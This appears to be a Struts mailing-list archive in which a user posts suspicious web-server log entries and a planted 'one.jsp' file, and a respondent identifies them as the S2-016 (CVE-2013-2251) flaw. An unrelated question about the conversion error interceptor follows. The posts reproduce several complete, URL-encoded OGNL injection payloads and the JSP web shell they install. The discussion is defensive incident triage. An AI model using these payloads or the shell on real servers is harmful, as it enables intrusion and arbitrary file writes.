Re: Suspicious Request
On 2/13/2018 3:57 PM, Rajvinder Pal wrote: > I am using struts2 2.3.16.1 version. That may be the reason 404 error is > returned. But still i got a new file "one.jsp", inside the WAR. It has > only one IF condition as give below:- > > <%if(request.getParameter("f")!=null)(new > java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> Oh! do you see above block at end of your index.jsp? If so then attacker is or was enable to append this block there! Firstly delete that block and try following to see if your webapp still has this vulnerability via reproducing the attack: > "GET > /index.do?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E > HTTP/1.1" 404 206 14249 0 > ?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E > -
Re: Suspicious Request
On 2/13/2018 12:34 PM, Rajvinder Pal wrote: > Hi, > > I have a struts application deployed on application server. Some time I am > receiving the below requests in web server logs. Not sure if i can post it > in this struts forum. What should i do to restrict it?What kind of > vulnerability it is ? Hi, It seems it's S2-016 [1] (CVE-2013-2251 [2]). [1] https://cwiki.apache.org/confluence/display/WW/S2-016 [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251 - To unsubscribe, e-mail: user-unsubscr...@struts.apache.org For additional commands, e-mail: user-h...@struts.apache.org
Re: Suspicious Request
Hi Yasser, I am using struts2 2.3.16.1 version. That may be the reason 404 error is returned. But still i got a new file "one.jsp", inside the WAR. It has only one IF condition as give below:- <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> Regards, Raj On Tue, Feb 13, 2018 at 5:43 PM, Yasser Zamaniwrote: > > > On 2/13/2018 12:34 PM, Rajvinder Pal wrote: > > Hi, > > > > I have a struts application deployed on application server. Some time I > am > > receiving the below requests in web server logs. Not sure if i can post > it > > in this struts forum. What should i do to restrict it?What kind of > > vulnerability it is ? > > Hi, > > It seems it's S2-016 [1] (CVE-2013-2251 [2]). > > [1] https://cwiki.apache.org/confluence/display/WW/S2-016 > [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251 > > > - > To unsubscribe, e-mail: user-unsubscr...@struts.apache.org > For additional commands, e-mail: user-h...@struts.apache.org >
Suspicious Request
Hi, I have a struts application deployed on application server. Some time I am receiving the below requests in web server logs. Not sure if i can post it in this struts forum. What should i do to restrict it?What kind of vulnerability it is ? "GET /index.do?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E HTTP/1.1" 404 206 14249 0 ?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E - "GET /index.php?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E HTTP/1.1" 404 207 1378 0 ?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E - "GET /admin/index.action?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()} HTTP/1.1" 404 216 1634 0 ?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()} - Regards, Raj
Conversion Error Interceptor prevent errors for empty values
Can someone provide some clarification on if this interceptor should be adding a field error when an empty string is passed to a Integer in the action? I am trying to prevent the field error from happening in this case. It looks like it should not be happening according to the docs: https://struts.apache.org/core-developers/conversion-error-interceptor.html , or am I not understanding what it is saying here: "This interceptor extends ConversionErrorInterceptor but only adds conversion errors from the ActionContext to the field errors of the action if the field value is not null, "", or {""} (a size 1 String array with only an empty String). See ConversionErrorInterceptor for more information, as well as the Type Conversion documentation" Paul R. Zepernick Sr. Programmer Analyst HealthSmart Benefit Solutions Disclaimer: This communication and any files transmitted with it may contain information that is privileged, confidential and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this communication in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. Thank you.